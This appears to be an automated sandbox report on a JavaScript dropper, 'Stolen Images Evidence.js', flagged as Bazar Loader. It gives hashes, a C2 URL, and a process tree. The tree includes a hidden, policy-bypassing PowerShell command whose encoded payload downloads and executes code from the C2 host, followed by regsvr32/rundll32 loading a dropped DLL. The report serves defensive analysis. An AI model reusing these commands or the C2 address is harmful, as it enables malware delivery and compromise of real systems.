Analysis
-
max time kernel
142s -
max time network
147s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
12-10-2021 13:44
Static task
static1
Behavioral task
behavioral1
Sample
Stolen Images Evidence.js
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
Stolen Images Evidence.js
Resource
win10v20210408
General
-
Target
Stolen Images Evidence.js
-
Size
18KB
-
MD5
e26be3479f0589233e8eb4c61ad4d8cb
-
SHA1
77828932f8427f43503e7c957a368d1ae2078c24
-
SHA256
251dba6ce4450b1ce3520ce63b79ea0ebc29e7b67276d4c9ca47ea6db264a612
-
SHA512
852b1c812ba10ea6fa16d510e1913fa10d765f5842ee1b4df1c449ba7b9ce2c4117ea53ea8858d54d1248cb6165cc995e71401ca65055d93f7763818a8df7be2
Malware Config
Extracted
http://polidors.space/333g100/index.php
Signatures
-
Bazar Loader
Detected loader normally used to deploy BazarBackdoor malware.
-
Bazar/Team9 Loader payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/536-66-0x0000000001DE0000-0x0000000001F98000-memory.dmp BazarLoaderVar6 behavioral1/memory/1372-68-0x0000000001CD0000-0x0000000001E88000-memory.dmp BazarLoaderVar6 -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 792 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
regsvr32.exerundll32.exepid process 536 regsvr32.exe 1372 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 792 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 792 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
wscript.execmd.exepowershell.exedescription pid process target process PID 1620 wrote to memory of 1624 1620 wscript.exe cmd.exe PID 1620 wrote to memory of 1624 1620 wscript.exe cmd.exe PID 1620 wrote to memory of 1624 1620 wscript.exe cmd.exe PID 1624 wrote to memory of 792 1624 cmd.exe powershell.exe PID 1624 wrote to memory of 792 1624 cmd.exe powershell.exe PID 1624 wrote to memory of 792 1624 cmd.exe powershell.exe PID 792 wrote to memory of 536 792 powershell.exe regsvr32.exe PID 792 wrote to memory of 536 792 powershell.exe regsvr32.exe PID 792 wrote to memory of 536 792 powershell.exe regsvr32.exe PID 792 wrote to memory of 536 792 powershell.exe regsvr32.exe PID 792 wrote to memory of 536 792 powershell.exe regsvr32.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\Stolen Images Evidence.js"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcABvAGwAaQBkAG8AcgBzAC4AcwBwAGEAYwBlAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcABvAGwAaQBkAG8AcgBzAC4AcwBwAGEAYwBlAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\regsvr32.exe"C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\QdncBkW.dat4⤵
- Loads dropped DLL
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\QdncBkW.dat,DllRegisterServer {F5AF8965-203E-48CC-989D-190F3623E6B9}1⤵
- Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\QdncBkW.datMD5
4d176b4113296377ea1a9e2d662090fa
SHA1d2c7be676546a241de4c10bba833846ae7b7e1c7
SHA256e58d341e2d833971570db8c25ef61aa73c13d7ac11d2b31ff1f577a5e64f1d09
SHA51233595db967810dd62d718b72253aabe14c606a9c9fa1d25707512b60806f61ff0a83daefa54ee18fed7408d5d564f9a0fac25a4bff8314e879d0a48026c371f7
-
\Users\Admin\AppData\Local\Temp\QdncBkW.datMD5
4d176b4113296377ea1a9e2d662090fa
SHA1d2c7be676546a241de4c10bba833846ae7b7e1c7
SHA256e58d341e2d833971570db8c25ef61aa73c13d7ac11d2b31ff1f577a5e64f1d09
SHA51233595db967810dd62d718b72253aabe14c606a9c9fa1d25707512b60806f61ff0a83daefa54ee18fed7408d5d564f9a0fac25a4bff8314e879d0a48026c371f7
-
\Users\Admin\AppData\Local\Temp\QdncBkW.datMD5
4d176b4113296377ea1a9e2d662090fa
SHA1d2c7be676546a241de4c10bba833846ae7b7e1c7
SHA256e58d341e2d833971570db8c25ef61aa73c13d7ac11d2b31ff1f577a5e64f1d09
SHA51233595db967810dd62d718b72253aabe14c606a9c9fa1d25707512b60806f61ff0a83daefa54ee18fed7408d5d564f9a0fac25a4bff8314e879d0a48026c371f7
-
memory/536-62-0x0000000000000000-mapping.dmp
-
memory/536-66-0x0000000001DE0000-0x0000000001F98000-memory.dmpFilesize
1.7MB
-
memory/792-57-0x000007FEF23E0000-0x000007FEF2F3D000-memory.dmpFilesize
11.4MB
-
memory/792-60-0x0000000002864000-0x0000000002867000-memory.dmpFilesize
12KB
-
memory/792-61-0x000000000286B000-0x000000000288A000-memory.dmpFilesize
124KB
-
memory/792-59-0x0000000002862000-0x0000000002864000-memory.dmpFilesize
8KB
-
memory/792-58-0x0000000002860000-0x0000000002862000-memory.dmpFilesize
8KB
-
memory/792-55-0x0000000000000000-mapping.dmp
-
memory/1372-68-0x0000000001CD0000-0x0000000001E88000-memory.dmpFilesize
1.7MB
-
memory/1620-53-0x000007FEFC4F1000-0x000007FEFC4F3000-memory.dmpFilesize
8KB
-
memory/1624-54-0x0000000000000000-mapping.dmp